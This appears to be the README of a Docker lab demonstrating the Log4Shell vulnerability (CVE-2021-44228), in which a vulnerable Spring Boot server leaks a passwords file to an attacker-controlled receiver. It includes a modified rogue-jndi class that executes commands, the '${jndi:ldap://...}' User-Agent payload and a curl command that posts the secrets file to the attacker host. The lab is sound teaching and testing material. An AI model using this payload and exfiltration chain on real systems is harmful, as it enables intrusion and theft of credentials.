A simple demonstration of CVE-2021-44228 to transfer data from a vulnerable server to a web service controlled by an attacker. All components involved are running via Docker.
This is a standard Java server acting as the victim. It's running:
- Java
8u111 - Web Application (Spring Boot 2.6.1)
- Log4J
This server is VULNERABLE using this configuration.
Additional Information:
- endpoint at
/logging(GET) will log the user agent using Log4J /foo/passwords.txtexists (the attackers target)
Content of passwords.txt:
my secret
This is a standard Java server acting as the data collector of the attacker. It's running:
- Java
17 - Web Application (Spring Boot 2.6.1)
Additional information:
- endpoint at
receiver(POST) will log the request body
This is an LDAP server powered by rogue-jndi.
Its ExportJava class has been modified so that commands passed via the -c flag get executed.
public ExportObject() {
try {
Runtime.getRuntime().exec(Config.command);
} catch(Exception e) {
e.printStackTrace();
}
}When requested by the vulnerable server it will respond with a class running the following command when instantiated:
curl -XPOST http://172.18.18.11:8082/receiver --data-binary @/foo/passwords.txtThis will effectively post the content of /foo/passwords.txt to the malicious receiver's prepared endpoint.
- setup Docker images by running:
./build.sh
- start component containers by running:
./start.sh
- trigger the vulnerability by running:
curl -A '${jndi:ldap://172.18.18.10/o=reference}' localhost:8081/logging - check the logging output of the malicious receiver component by running:
There should be the content of the server's
docker logs --timestamps docker_malicious-receiver_1
passwords.txtfile. - stop component containers by running:
./stop.sh